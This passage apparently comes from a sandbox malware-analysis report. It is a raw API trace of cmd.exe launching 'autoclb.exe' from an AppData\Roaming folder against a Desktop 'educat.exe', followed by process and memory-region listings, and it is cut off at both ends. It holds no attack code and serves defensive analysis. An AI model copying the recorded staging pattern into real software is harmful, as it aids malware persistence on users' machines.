lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.685] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0065.685] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0065.685] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0065.685] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0065.685] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0065.685] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0065.685] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0065.685] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0065.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x40fb8c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0065.685] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x40fb8c, lpFilePart=0x40fb84 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x40fb84*="Desktop") returned 0x1d [0065.685] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0065.686] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x40f908 | out: lpFindFileData=0x40f908) returned 0x529f40 [0065.686] FindClose (in: hFindFile=0x529f40 | out: hFindFile=0x529f40) returned 1 [0065.686] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x40f908 | out: lpFindFileData=0x40f908) returned 0x529f40 [0065.686] FindClose (in: hFindFile=0x529f40 | out: hFindFile=0x529f40) returned 1 [0065.686] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0065.686] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x40f908 | out: lpFindFileData=0x40f908) returned 0x529f40 [0065.686] FindClose (in: hFindFile=0x529f40 | out: hFindFile=0x529f40) returned 1 [0065.686] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0065.686] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0065.687] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0065.687] GetEnvironmentStringsW () returned 0x5280e8* [0065.687] FreeEnvironmentStringsA (penv="=") returned 1 [0065.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa16720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0065.688] GetConsoleOutputCP () returned 0x1b5 [0065.688] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa0e460 | out: lpCPInfo=0xa0e460) returned 1 [0065.688] GetUserDefaultLCID () returned 0x409 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xa124a0, cchData=8 | out: lpLCData=":") returned 2 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x40fcbc, cchData=128 | out: lpLCData="0") returned 2 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x40fcbc, cchData=128 | out: lpLCData="0") returned 2 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x40fcbc, cchData=128 | out: lpLCData="1") returned 2 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xa124b0, cchData=8 | out: lpLCData="/") returned 2 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xa12500, cchData=32 | out: lpLCData="Mon") returned 4 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xa12540, cchData=32 | out: lpLCData="Tue") returned 4 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xa12580, cchData=32 | out: lpLCData="Wed") returned 4 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xa125c0, cchData=32 | out: lpLCData="Thu") returned 4 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xa12600, cchData=32 | out: lpLCData="Fri") returned 4 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xa12640, cchData=32 | out: lpLCData="Sat") returned 4 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xa12680, cchData=32 | out: lpLCData="Sun") returned 4 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xa124c0, cchData=8 | out: lpLCData=".") returned 2 [0065.689] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xa124e0, cchData=8 | out: lpLCData=",") returned 2 [0065.689] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0065.690] GetConsoleTitleW (in: lpConsoleTitle=0x5280e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0065.691] GetProcAddress (hModule=0x75260000, lpProcName="CopyFileExW") returned 0x7527fa80 [0065.691] GetProcAddress (hModule=0x75260000, lpProcName="IsDebuggerPresent") returned 0x7527a790 [0065.691] GetProcAddress (hModule=0x75260000, lpProcName="SetConsoleInputExeNameW") returned 0x74f835c0 [0065.692] _wcsicmp (_String1="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\"", _String2=")") returned -7 [0065.692] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\"") returned 68 [0065.692] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\"") returned 68 [0065.692] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\"") returned 71 [0065.692] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\"") returned 71 [0065.692] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\"") returned 80 [0065.692] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\"") returned 80 [0065.694] GetConsoleTitleW (in: lpConsoleTitle=0x40f9a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.694] GetFileAttributesW (lpFileName="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmn~1\\appdata\\roaming\\adsldraw\\autoclb.exe\"")) returned 0xffffffff [0065.694] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0065.694] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0065.694] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0065.694] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0065.694] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0065.694] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0065.694] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0065.694] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0065.694] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0065.694] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0065.694] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0065.694] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0065.694] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0065.694] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0065.695] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0065.695] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0065.695] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0065.695] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0065.695] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0065.695] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0065.695] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0065.695] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0065.695] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0065.695] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0065.695] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0065.695] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0065.695] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0065.695] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0065.695] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0065.695] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0065.695] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0065.695] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0065.695] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0065.695] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0065.695] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0065.695] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0065.695] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0065.695] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0065.695] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0065.695] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0065.695] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0065.695] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0065.695] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0065.695] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0065.695] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0065.695] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0065.695] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0065.695] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0065.695] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0065.695] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0065.695] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0065.695] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0065.695] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0065.695] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0065.695] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0065.696] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0065.696] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0065.696] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0065.696] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0065.696] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0065.696] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0065.696] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0065.696] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0065.696] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0065.696] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0065.696] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0065.696] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0065.696] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0065.696] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0065.696] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0065.696] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0065.696] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0065.696] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0065.696] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0065.696] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0065.696] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0065.696] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0065.696] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0065.696] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0065.696] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0065.696] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0065.696] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0065.696] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0065.696] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0065.696] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0065.696] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0065.696] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0065.697] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0065.697] SetErrorMode (uMode=0x0) returned 0x0 [0065.697] SetErrorMode (uMode=0x1) returned 0x0 [0065.697] GetFullPathNameW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\.", nBufferLength=0x208, lpBuffer=0x5286e0, lpFilePart=0x40f4b4 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw", lpFilePart=0x40f4b4*="adsldraw") returned 0x2a [0065.697] SetErrorMode (uMode=0x0) returned 0x1 [0065.697] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\.") returned 1 [0065.698] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.701] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0065.701] FindFirstFileExW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", fInfoLevelId=0x1, lpFindFileData=0x40f260, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x40f260) returned 0x524448 [0065.701] FindClose (in: hFindFile=0x524448 | out: hFindFile=0x524448) returned 1 [0065.701] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0065.701] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0065.701] GetConsoleTitleW (in: lpConsoleTitle=0x40f734, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.701] InitializeProcThreadAttributeList (in: lpAttributeList=0x40f660, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x40f644 | out: lpAttributeList=0x40f660, lpSize=0x40f644) returned 1 [0065.701] UpdateProcThreadAttribute (in: lpAttributeList=0x40f660, dwFlags=0x0, Attribute=0x60001, lpValue=0x40f64c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x40f660, lpPreviousValue=0x0) returned 1 [0065.701] GetStartupInfoW (in: lpStartupInfo=0x40f698 | out: lpStartupInfo=0x40f698*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="cmd /C \"\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0065.702] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0065.703] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0065.703] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0065.703] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0065.703] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0065.703] lstrcmpW (lpString1="\\autoclb.exe", lpString2="\\XCOPY.EXE") returned -1 [0065.704] CreateProcessW (in: lpApplicationName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpCommandLine="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x40f5e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x40f634 | out: lpCommandLine="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", lpProcessInformation=0x40f634*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xfa8, dwThreadId=0xfac)) returned 1 [0065.813] CloseHandle (hObject=0xa4) returned 1 [0065.813] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0065.813] GetEnvironmentStringsW () returned 0x529f40* [0065.813] FreeEnvironmentStringsA (penv="=") returned 1 [0065.813] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0070.575] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x40f5cc | out: lpExitCode=0x40f5cc*=0x0) returned 1 [0070.575] CloseHandle (hObject=0xa8) returned 1 [0070.575] _vsnwprintf (in: _Buffer=0x40f6b4, _BufferCount=0x13, _Format="%08X", _ArgList=0x40f5d4 | out: _Buffer="00000000") returned 8 [0070.575] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0070.576] GetEnvironmentStringsW () returned 0x537a50* [0070.576] FreeEnvironmentStringsA (penv="=") returned 1 [0070.576] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0070.576] GetEnvironmentStringsW () returned 0x537a50* [0070.576] FreeEnvironmentStringsA (penv="=") returned 1 [0070.576] DeleteProcThreadAttributeList (in: lpAttributeList=0x40f660 | out: lpAttributeList=0x40f660) [0070.576] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.576] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0070.576] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.576] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0e40c | out: lpMode=0xa0e40c) returned 1 [0070.577] _get_osfhandle (_FileHandle=0) returned 0x38 [0070.577] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xa0e408 | out: lpMode=0xa0e408) returned 1 [0070.577] SetConsoleInputExeNameW () returned 0x1 [0070.577] GetConsoleOutputCP () returned 0x1b5 [0070.577] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa0e460 | out: lpCPInfo=0xa0e460) returned 1 [0070.577] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.577] exit (_Code=0) Thread: id = 18 os_tid = 0xfa4 Process: id = "6" image_name = "autoclb.exe" filename = "c:\\users\\ciihmn~1\\appdata\\roaming\\adsldraw\\autoclb.exe" page_root = "0x13e99000" os_pid = "0xfa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xf9c" cmd_line = "\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 487 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 488 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 489 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 490 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 491 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 492 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 493 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 494 start_va = 0x400000 end_va = 0x512fff entry_point = 0x400000 region_type = mapped_file name = "autoclb.exe" filename = "\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\adsldraw\\autoclb.exe") Region: id = 495 start_va = 0x77ca0000 end_va = 0x77e18fff entry_point = 0x77ca0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 496 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 497 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 498 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 499 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 500 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 501 start_va = 0x7fff0000 end_va = 0x7ff8ee37ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 502 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 503 start_va = 0x7ff8ee542000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff8ee542000" filename = "" Region: id = 504 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 505 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 506 start_va = 0x64af0000 end_va = 0x64b62fff entry_point = 0x64af0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 507 start_va = 0x64b70000 end_va = 0x64bbefff entry_point = 0x64b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 508 start_va = 0x64ae0000 end_va = 0x64ae7fff entry_point = 0x64ae0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 509 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 510 start_va = 0x1f0000 end_va = 0x2adfff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 511 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 512 start_va = 0x74ca0000 end_va = 0x74d30fff entry_point = 0x74ca0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 513 start_va = 